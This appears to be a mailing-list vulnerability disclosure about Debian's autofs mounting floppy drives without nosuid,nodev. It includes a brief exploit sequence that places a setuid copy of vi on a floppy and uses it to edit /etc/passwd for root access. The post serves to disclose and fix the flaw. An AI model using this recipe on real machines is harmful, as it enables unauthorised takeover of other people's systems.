I'm obviously doing something wrong ... I've written to the maintainer of the autofs package according to the page summary listed under 'packages' from the website, and as I also saw somewhere else (dpkg -s listing?). I filed a bug report against autofs and marked it as release critical. I have heard nothing for the past two (three?) days and need to make this known:
There is a severe security problem for all debian machines running any version of autofs and having a floppy drive available as /dev/fd0. The options listed in /etc/auto.misc fail to include the options "nosuid,nodev" and as such anyone with a floppy disk and physical access to a floppy drive may become root on that machine. Here is the 'sploit: # superformat /dev/fd0u1440 # mke2fs /dev/fd0 # cp /usr/bin/vi /var/autofs/floppy # chmod u+s /var/autofs/floppy/vi # umount /var/autofs/floppy [sneakernet to victim] % /var/autofs/floppy/vi /etc/passwd :wq! % telnet localhost [...] Well, you get the idea. All user-modifiable filesystems must be mounted nosuid,nodev or the systems that trust them can be trivially compromised. Besides floppy, this also includes the 'removable' /dev/hdd, and possibly the CD-ROM as well. regards, Christopher
